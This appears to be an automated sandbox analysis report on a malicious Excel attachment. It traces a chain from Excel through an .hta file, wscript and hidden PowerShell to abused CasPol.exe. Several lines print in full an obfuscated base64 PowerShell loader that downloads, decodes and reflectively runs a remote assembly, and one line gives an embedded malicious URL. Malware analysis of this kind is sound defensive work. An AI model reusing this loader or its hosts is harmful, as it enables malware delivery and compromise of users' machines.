          Source: unknownHTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49170 version: TLS 1.2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0041183A OpenClipboard,GetLastError,DeleteFileW,31_2_0041183A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,31_2_0040987A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,31_2_004098E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 41_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,41_2_00406DFC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 41_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,41_2_00406E9F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 42_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,42_2_004068B5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 42_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,42_2_004072B5
          Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
          Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS
          Source: CasPol.exeProcess created: 40

          System Summary

          barindex
          Source: Process Memory Space: powershell.exe PID: 2140, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: Process Memory Space: powershell.exe PID: 3972, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: A & C Metrology OC 545714677889Materiale.xlsOLE: Microsoft Excel 2007+
          Source: A & C Metrology OC 545714677889Materiale.xlsOLE: Microsoft Excel 2007+
          Source: ~DFE74F55484018A372.TMP.0.drOLE: Microsoft Excel 2007+
          Source: 7B130000.0.drOLE: Microsoft Excel 2007+
          Source: 7B130000.0.drOLE: Microsoft Excel 2007+
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ernashgetmebackwithgoodnewswhichgrreatthings[1].htaJump to behavior
          Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVuZEluZGV4ID0gWmthaW1hZ2VUZXh0LkluZGV4T2YoWmthZW5kRmxhZycrJyk7Wmthc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIFprYWVuZEluZGV4IC1ndCBaJysna2FzdCcrJ2FydEluZGV4O1prYXN0YXJ0SW4nKydkZXggKz0gWmthc3RhcnRGbGFnLkxlbmd0aDtaa2FiYXNlNjRMZW5ndGgnKycgPSBaa2FlbmRJbmRleCAtIFprYXN0YXJ0SW5kZXg7WmthYmFzZTY0Q29tbWFuZCA9IFprYWltYWdlVGV4dC5TdWJzdHJpbicrJ2coWmthc3RhcnRJbmRleCwgJysnWmthYmFzJysnZTY0TGVuZ3RoKTtaa2FiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChaa2FiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgS041IEZvckVhY2gtT2JqZWN0IHsgWmsnKydhXyB9KVstMS4uLShaa2FiJysnYXMnKydlNjRDb21tYW5kLkxlbmd0aCldO1prYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlJysnNjRTdHJpbmcoWmthYmFzZTY0UmV2ZXJzZWQpO1prYWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChaa2Fjb21tYScrJ25kQnl0ZXMpO1prYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoUUN4VkFJUUN4KTtaa2F2YWlNZXRob2QuSW52b2tlKFprYW51bGwsIEAoUUN4dHh0LlJSRlZHR0ZSLzc1LzY0LjY0MS40NzEuNzAxLy86cHR0aFFDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUMnKyd4ZGVzYXRpdmFkb1FDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUN4Q2FzJysnUG9sUUN4LCBRQ3hkZXNhdGl2YWRvUScrJ0N4LCBRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3gxUUN4LFFDeGRlc2F0aXZhZG9RQ3gpKTsnKS5yRVBMYUNlKChbY0hhUl05MCtbY0hhUl0xMDcrW2NIYVJdOTcpLFtzVHJJbmddW2NIYVJdMzYpLnJFUExhQ2UoJ0tONScsW3NUckluZ11bY0hhUl0xMjQpLnJFUExhQ2UoKFtjSGFSXTgxK1tjSGFSXTY3K1tjSGFSXTEyMCksW3NUckluZ11bY0hhUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVuZEluZGV4ID0gWmthaW1hZ2VUZXh0LkluZGV4T2YoWmthZW5kRmxhZycrJyk7Wmthc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIFprYWVuZEluZGV4IC1ndCBaJysna2FzdCcrJ2FydEluZGV4O1prYXN0YXJ0SW4nKydkZXggKz0gWmthc3RhcnRGbGFnLkxlbmd0aDtaa2FiYXNlNjRMZW5ndGgnKycgPSBaa2FlbmRJbmRleCAtIFprYXN0YXJ0SW5kZXg7WmthYmFzZTY0Q29tbWFuZCA9IFprYWltYWdlVGV4dC5TdWJzdHJpbicrJ2coWmthc3RhcnRJbmRleCwgJysnWmthYmFzJysnZTY0TGVuZ3RoKTtaa2FiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChaa2FiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgS041IEZvckVhY2gtT2JqZWN0IHsgWmsnKydhXyB9KVstMS4uLShaa2FiJysnYXMnKydlNjRDb21tYW5kLkxlbmd0aCldO1prYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlJysnNjRTdHJpbmcoWmthYmFzZTY0UmV2ZXJzZWQpO1prYWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChaa2Fjb21tYScrJ25kQnl0ZXMpO1prYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoUUN4VkFJUUN4KTtaa2F2YWlNZXRob2QuSW52b2tlKFprYW51bGwsIEAoUUN4dHh0LlJSRlZHR0ZSLzc1LzY0LjY0MS40NzEuNzAxLy86cHR0aFFDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUMnKyd4ZGVzYXRpdmFkb1FDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUN4Q2FzJysnUG9sUUN4LCBRQ3hkZXNhdGl2YWRvUScrJ0N4LCBRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3gxUUN4LFFDeGRlc2F0aXZhZG9RQ3gpKTsnKS5yRVBMYUNlKChbY0hhUl05MCtbY0hhUl0xMDcrW2NIYVJdOTcpLFtzVHJJbmddW2NIYVJdMzYpLnJFUExhQ2UoJ0tONScsW3NUckluZ11bY0hhUl0xMjQpLnJFUExhQ2UoKFtjSGFSXTgxK1tjSGFSXTY3K1tjSGFSXTEyMCksW3NUckluZ11bY0hhUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVuZEluZGV4ID0gWmthaW1hZ2VUZXh0LkluZGV4T2YoWmthZW5kRmxhZycrJyk7Wmthc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIFprYWVuZEluZGV4IC1ndCBaJysna2FzdCcrJ2FydEluZGV4O1prYXN0YXJ0SW4nKydkZXggKz0gWmthc3RhcnRGbGFnLkxlbmd0aDtaa2FiYXNlNjRMZW5ndGgnKycgPSBaa2FlbmRJbmRleCAtIFprYXN0YXJ0SW5kZXg7WmthYmFzZTY0Q29tbWFuZCA9IFprYWltYWdlVGV4dC5TdWJzdHJpbicrJ2coWmthc3RhcnRJbmRleCwgJysnWmthYmFzJysnZTY0TGVuZ3RoKTtaa2FiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChaa2FiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgS041IEZvckVhY2gtT2JqZWN0IHsgWmsnKydhXyB9KVstMS4uLShaa2FiJysnYXMnKydlNjRDb21tYW5kLkxlbmd0aCldO1prYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlJysnNjRTdHJpbmcoWmthYmFzZTY0UmV2ZXJzZWQpO1prYWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChaa2Fjb21tYScrJ25kQnl0ZXMpO1prYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoUUN4VkFJUUN4KTtaa2F2YWlNZXRob2QuSW52b2tlKFprYW51bGwsIEAoUUN4dHh0LlJSRlZHR0ZSLzc1LzY0LjY0MS40NzEuNzAxLy86cHR0aFFDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUMnKyd4ZGVzYXRpdmFkb1FDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUN4Q2FzJysnUG9sUUN4LCBRQ3hkZXNhdGl2YWRvUScrJ0N4LCBRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3gxUUN4LFFDeGRlc2F0aXZhZG9RQ3gpKTsnKS5yRVBMYUNlKChbY0hhUl05MCtbY0hhUl0xMDcrW2NIYVJdOTcpLFtzVHJJbmddW2NIYVJdMzYpLnJFUExhQ2UoJ0tONScsW3NUckluZ11bY0hhUl0xMjQpLnJFUExhQ2UoKFtjSGFSXTgxK1tjSGFSXTY3K1tjSGFSXTEyMCksW3NUckluZ11bY0hhUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVuZEluZGV4ID0gWmthaW1hZ2VUZXh0LkluZGV4T2YoWmthZW5kRmxhZycrJyk7Wmthc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIFprYWVuZEluZGV4IC1ndCBaJysna2FzdCcrJ2FydEluZGV4O1prYXN0YXJ0SW4nKydkZXggKz0gWmthc3RhcnRGbGFnLkxlbmd0aDtaa2FiYXNlNjRMZW5ndGgnKycgPSBaa2FlbmRJbmRleCAtIFprYXN0YXJ0SW5kZXg7WmthYmFzZTY0Q29tbWFuZCA9IFprYWltYWdlVGV4dC5TdWJzdHJpbicrJ2coWmthc3RhcnRJbmRleCwgJysnWmthYmFzJysnZTY0TGVuZ3RoKTtaa2FiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChaa2FiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgS041IEZvckVhY2gtT2JqZWN0IHsgWmsnKydhXyB9KVstMS4uLShaa2FiJysnYXMnKydlNjRDb21tYW5kLkxlbmd0aCldO1prYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlJysnNjRTdHJpbmcoWmthYmFzZTY0UmV2ZXJzZWQpO1prYWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChaa2Fjb21tYScrJ25kQnl0ZXMpO1prYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoUUN4VkFJUUN4KTtaa2F2YWlNZXRob2QuSW52b2tlKFprYW51bGwsIEAoUUN4dHh0LlJSRlZHR0ZSLzc1LzY0LjY0MS40NzEuNzAxLy86cHR0aFFDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUMnKyd4ZGVzYXRpdmFkb1FDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUN4Q2FzJysnUG9sUUN4LCBRQ3hkZXNhdGl2YWRvUScrJ0N4LCBRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3gxUUN4LFFDeGRlc2F0aXZhZG9RQ3gpKTsnKS5yRVBMYUNlKChbY0hhUl05MCtbY0hhUl0xMDcrW2NIYVJdOTcpLFtzVHJJbmddW2NIYVJdMzYpLnJFUExhQ2UoJ0tONScsW3NUckluZ11bY0hhUl0xMjQpLnJFUExhQ2UoKFtjSGFSXTgxK1tjSGFSXTY3K1tjSGFSXTEyMCksW3NUckluZ11bY0hhUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: 770B0000 page execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: 770B0000 page execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: 770B0000 page execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: 770B0000 page execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: 770B0000 page execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: 770B0000 page execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,31_2_0040DD85
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00401806 NtdllDefWindowProc_W,31_2_00401806
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_004018C0 NtdllDefWindowProc_W,31_2_004018C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 41_2_004016FD NtdllDefWindowProc_A,41_2_004016FD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 41_2_004017B7 NtdllDefWindowProc_A,41_2_004017B7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 42_2_00402CAC NtdllDefWindowProc_A,42_2_00402CAC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 42_2_00402D66 NtdllDefWindowProc_A,42_2_00402D66
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0044B04031_2_0044B040
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0043610D31_2_0043610D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0044731031_2_00447310
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0044A49031_2_0044A490
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0040755A31_2_0040755A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0043C56031_2_0043C560
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0044B61031_2_0044B610
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0044D6C031_2_0044D6C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_004476F031_2_004476F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0044B87031_2_0044B870
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0044081D31_2_0044081D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0041495731_2_00414957
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_004079EE31_2_004079EE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00407AEB31_2_00407AEB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0044AA8031_2_0044AA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00412AA931_2_00412AA9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00404B7431_2_00404B74
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00404B0331_2_00404B03
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0044BBD831_2_0044BBD8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00404BE531_2_00404BE5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00404C7631_2_00404C76
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00415CFE31_2_00415CFE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00416D7231_2_00416D72
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00446D3031_2_00446D30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00446D8B31_2_00446D8B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00406E8F31_2_00406E8F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 41_2_0040503841_2_00405038
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 41_2_0041208C41_2_0041208C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 41_2_004050A941_2_004050A9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 41_2_0040511A41_2_0040511A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 41_2_0043C13A41_2_0043C13A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 41_2_004051AB41_2_004051AB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 41_2_0044930041_2_00449300
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 41_2_0040D32241_2_0040D322
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 41_2_0044A4F041_2_0044A4F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 41_2_0043A5AB41_2_0043A5AB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 41_2_0041363141_2_00413631
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 41_2_0044669041_2_00446690
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 41_2_0044A73041_2_0044A730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 41_2_004398D841_2_004398D8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 41_2_004498E041_2_004498E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 41_2_0044A88641_2_0044A886
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 41_2_0043DA0941_2_0043DA09
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 41_2_00438D5E41_2_00438D5E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 41_2_00449ED041_2_00449ED0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 41_2_0041FE8341_2_0041FE83
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 41_2_00430F5441_2_00430F54
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 42_2_004050C242_2_004050C2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 42_2_004014AB42_2_004014AB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 42_2_0040513342_2_00405133
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 42_2_004051A442_2_004051A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 42_2_0040124642_2_00401246
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 42_2_0040CA4642_2_0040CA46
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 42_2_0040523542_2_00405235
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 42_2_004032C842_2_004032C8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 42_2_0040168942_2_00401689
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 42_2_00402F6042_2_00402F60
          Source: A & C Metrology OC 545714677889Materiale.xlsStream path 'MBD014C1E4E/\x1Ole' : https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrainwE{1C*|/".3<AjDl?/a|MC{qo3~zZ!#5'9)I)2y&=7cp(YmMCYgK?N".D l8_Z}1_py{qXzFlp*IU=mvBI2Sc0CDRg?&GtZc*T5XCb5UHP64ExMzL9BeKzDMl0TEy1aHsvRa71roB1scx0pykPKUyTJHlXZ7mtQUGyoycxQYWnnUO1ubUyICMBRB89yONvnDJRoP3nWzFIidyrtxboDDCxVwPNn07HNeFaKcNw9cO4lqjgxGMexY0=o4+B2VE?.PPH
